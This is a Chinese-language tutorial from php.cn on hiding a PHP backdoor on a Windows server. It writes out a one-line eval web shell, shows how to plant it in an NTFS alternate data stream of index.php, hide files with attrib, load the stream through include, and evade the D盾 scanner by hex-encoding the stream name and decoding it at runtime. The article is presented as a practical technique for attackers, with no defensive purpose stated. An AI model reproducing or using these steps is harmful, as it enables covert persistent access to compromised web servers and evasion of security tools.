首頁 > 後端開發 > PHP問題 > php如何將後門隱藏?

php如何將後門隱藏?

coldplay.xixi
發布: 2023-03-03 08:52:02
原創
3426 人瀏覽過

php將後門隱藏的方法:先建立系統隱藏文件,並建立ADS隱藏文件;然後透過包含文件的方式來使用jpd;最後將【index.php:shell.jpg】hex編碼即可。

php如何將後門隱藏?

php將後門隱藏的方法:

一. attrib s h

建立系統隱藏檔案。

attrib s a r h  /  attrib s h檔名

php如何將後門隱藏?

## 

檢視隱藏檔案

php如何將後門隱藏?

 

二. 利用ADS隱藏檔案

  NTFS交換資料流(Alternate Data Streams,簡稱ADS)是NTFS磁碟格式的特性,在NTFS檔案系統下,每個檔案都可以存在多個資料流。通俗的理解,就是其它文件可以「寄宿」在某個文件身上,而在資源管理器中卻只能看到宿主文件,找不到寄宿文件。利用ADS資料流,我們可以做很多有趣的事。 (抄的)

 

1.先建立ADS隱藏檔案

在指令行,echo一個資料流進去,例如index檔是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg
登入後複製

這樣就產生了一個看不見的index.php:shell.jpg

php如何將後門隱藏?

可用

dir/r 指令來查看

php如何將後門隱藏?

修改與刪除

修改:

進入檔案所在目錄,notepad index.php:shell. jpg

php如何將後門隱藏?

如何刪除index.php:shell.jpg呢?

直接刪除index.php

php如何將後門隱藏?

2. 檔案包含

我們產生了index.php:shell .jpg,可以透過包含檔案的方式來使用。

<?php include(‘index.php:shell.jpg‘)?>
登入後複製

技術分享圖片

php如何將後門隱藏?

也可以用上面學的隱藏include.php

php如何將後門隱藏?

3. 免殺

隱藏了也不行兄dei,D盾一掃瞬間爆炸。

php如何將後門隱藏?

把index.php:shell.jpg  hex編碼

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex编码
$b="a";
include(PACK(‘H*‘,$$b))
?>
登入後複製

php如何將後門隱藏?

#相關學習推薦:

PHP程式設計從入門到精通

#

以上是php如何將後門隱藏?的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
php
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
作者最新文章
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板